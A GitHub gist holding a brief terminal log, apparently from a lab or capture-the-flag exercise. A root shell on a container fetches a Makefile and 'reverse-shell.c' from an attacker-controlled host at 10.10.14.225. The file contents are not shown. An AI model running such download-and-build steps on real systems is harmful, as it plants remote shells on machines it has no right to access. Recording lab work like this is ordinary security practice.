Skip to content

Instantly share code, notes, and snippets.

@oxtd
Created September 11, 2021 08:07
Show Gist options
  • Select an option

  • Save oxtd/0d6ae9fdc7482d3f6f16ec298cc42276 to your computer and use it in GitHub Desktop.

Select an option

Save oxtd/0d6ae9fdc7482d3f6f16ec298cc42276 to your computer and use it in GitHub Desktop.
11
root@53bdb03130a9:/tmp# wget http://10.10.14.225/Makefile
wget http://10.10.14.225/Makefile
--2021-09-11 08:20:24-- http://10.10.14.225/Makefile
Connecting to 10.10.14.225:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 161 [application/octet-stream]
Saving to: 'Makefile'
Makefile 100%[===================>] 161 --.-KB/s in 0s
2021-09-11 08:20:25 (29.4 MB/s) - 'Makefile' saved [161/161]
root@53bdb03130a9:/tmp# wget http://10.10.14.225/reverse-shell.c
wget http://10.10.14.225/reverse-shell.c
--2021-09-11 08:20:45-- http://10.10.14.225/reverse-shell.c
Connecting to 10.10.14.225:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 616 [text/x-csrc]
Saving to: 'reverse-shell.c'
reverse-shell.c 100%[===================>] 616 --.-KB/s in 0s
2021-09-11 08:20:45 (120 MB/s) - 'reverse-shell.c' saved [616/616]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment